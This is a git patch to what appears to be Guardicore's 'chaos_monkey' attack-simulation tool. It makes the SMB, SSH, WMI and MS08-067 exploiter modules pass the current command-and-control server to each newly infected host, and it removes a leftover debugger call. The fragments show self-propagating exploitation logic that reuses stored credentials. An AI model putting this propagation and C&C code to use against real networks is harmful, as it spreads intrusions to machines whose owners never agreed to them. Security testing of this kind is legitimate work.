From 3522e6e02d3e18aa89eb5b62a4456f38152548f0 Mon Sep 17 00:00:00 2001
From: urihershgc <uri@guardicore.com>
Date: Thu, 3 Dec 2015 16:38:50 +0200
Subject: [PATCH] GC-4600: monkey is propagating current C&C server

---
 chaos_monkey/exploit/rdpgrinder.py   | 4 ++--
 chaos_monkey/exploit/smbexec.py      | 2 ++
 chaos_monkey/exploit/sshexec.py      | 2 ++
 chaos_monkey/exploit/win_ms08_067.py | 2 ++
 chaos_monkey/exploit/wmiexec.py      | 2 ++
 chaos_monkey/model/host.py           | 4 ++++
 chaos_monkey/transport/http.py       | 3 ---
 7 files changed, 14 insertions(+), 5 deletions(-)

diff --git a/chaos_monkey/exploit/rdpgrinder.py b/chaos_monkey/exploit/rdpgrinder.py
index 5793c17ee..6535b4789 100644
--- a/chaos_monkey/exploit/rdpgrinder.py
+++ b/chaos_monkey/exploit/rdpgrinder.py
@@ -255,9 +255,9 @@ class RdpExploiter(HostExploiter):
             return False
 
         if self._config.rdp_use_vbs_download:
-            command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path' : http_path}
+            command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path}
         else:
-            command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': self._config.dropper_target_path, 'http_path' : http_path}
+            command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path}
 
         passwords = list(self._config.psexec_passwords[:])
         known_password = host.get_credentials(self._config.psexec_user)
diff --git a/chaos_monkey/exploit/smbexec.py b/chaos_monkey/exploit/smbexec.py
index 92090a61b..a84280aeb 100644
--- a/chaos_monkey/exploit/smbexec.py
+++ b/chaos_monkey/exploit/smbexec.py
@@ -105,6 +105,8 @@ class SmbExploiter(HostExploiter):
 
         if host.default_tunnel:
             cmdline += " -t " + host.default_tunnel
+        if host.default_server:
+            cmdline += " -s " + host.default_server
 
         for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
             rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))
diff --git a/chaos_monkey/exploit/sshexec.py b/chaos_monkey/exploit/sshexec.py
index 3adfb4e43..59f5369db 100644
--- a/chaos_monkey/exploit/sshexec.py
+++ b/chaos_monkey/exploit/sshexec.py
@@ -119,6 +119,8 @@ class SSHExploiter(HostExploiter):
             cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
             if host.default_tunnel:
                 cmdline += " -t " + host.default_tunnel
+            if host.default_server:
+                cmdline += " -s " + host.default_server
             
             cmdline += "&"
             ssh.exec_command(cmdline)
diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py
index 77454c518..64ed056dd 100644
--- a/chaos_monkey/exploit/win_ms08_067.py
+++ b/chaos_monkey/exploit/win_ms08_067.py
@@ -251,6 +251,8 @@ class Ms08_067_Exploiter(HostExploiter):
 
         if host.default_tunnel:
             cmdline += " -t " + host.default_tunnel
+        if host.default_server:
+            cmdline += " -s " + host.default_server
 
         try:
             sock.send("start %s\r\n" % (cmdline, ))
diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py
index cd316480a..0276128df 100644
--- a/chaos_monkey/exploit/wmiexec.py
+++ b/chaos_monkey/exploit/wmiexec.py
@@ -86,6 +86,8 @@ class WmiExploiter(HostExploiter):
 
             if host.default_tunnel:
                 cmdline += " -t " + host.default_tunnel
+            if host.default_server:
+                cmdline += " -s " + host.default_server
 
             # execute the remote monkey
             result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,
diff --git a/chaos_monkey/model/host.py b/chaos_monkey/model/host.py
index efe12d7cf..50e08751f 100644
--- a/chaos_monkey/model/host.py
+++ b/chaos_monkey/model/host.py
@@ -9,6 +9,7 @@ class VictimHost(object):
         self.services = {}
         self.monkey_exe = None
         self.default_tunnel = None
+        self.default_server = None
 
     def as_dict(self):
         return self.__dict__
@@ -36,3 +37,6 @@ class VictimHost(object):
 
     def get_credentials(self, username):
         return self.cred.get(username.lower(), None)
+
+    def set_default_server(self, default_server):
+        self.default_server = default_server
diff --git a/chaos_monkey/transport/http.py b/chaos_monkey/transport/http.py
index e7ae71f7b..6f10c1811 100644
--- a/chaos_monkey/transport/http.py
+++ b/chaos_monkey/transport/http.py
@@ -112,13 +112,10 @@ class HTTPConnectProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
         # just provide a tunnel, transfer the data with no modification
         req = self
         reqbody = None
-        import pdb
-        pdb.set_trace()
         req.path = "https://%s/" % req.path.replace(':443', '')
 
         u = urlsplit(req.path)
         address = (u.hostname, u.port or 443)
-        uri = u
         try:
             conn = socket.create_connection(address)
         except socket.error: